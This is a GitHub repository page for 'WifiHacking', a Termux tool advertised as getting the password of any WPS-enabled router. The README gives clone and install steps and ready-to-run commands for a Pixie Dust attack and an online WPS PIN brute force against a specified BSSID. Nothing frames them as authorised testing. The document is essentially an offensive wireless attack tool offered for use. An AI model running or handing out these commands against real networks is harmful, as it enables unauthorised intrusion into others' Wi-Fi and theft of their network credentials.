Skip to content

A termux tool to get password of any WPS enabled router.

Notifications You must be signed in to change notification settings

Paran360/WifiHacking

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 

Repository files navigation

WifiHacking

A termux tool to get password of any WPS enabled router.

Wifi_Hacking

Hack WIfi Using Termux! (Requires Root)

Installation :

$ git clone https://github.com/paran360/WifiHacking
$ cd WifiHacking
$ python installer.py

Example : sudo python wifihack.py -i wlan0 -K

Note:

First turn off your Wifi.

  • Show avaliable networks and start Pixie Dust attack on a specified network.
  • sudo python wifihack.py -i wlan0 -K
    • Start Pixie Dust attack on a specified BSSID: sudo python wifihack.py -i wlan0 -b 00:91:4C:C3:AC:28 -K
  • Launch online WPS bruteforce with the specified first half of the PIN:
  • sudo python wifihack.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234

Troubleshooting

"Device or resource busy (-16)" - Turn on Wifi and Then Turn off Wifi.

About

A termux tool to get password of any WPS enabled router.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages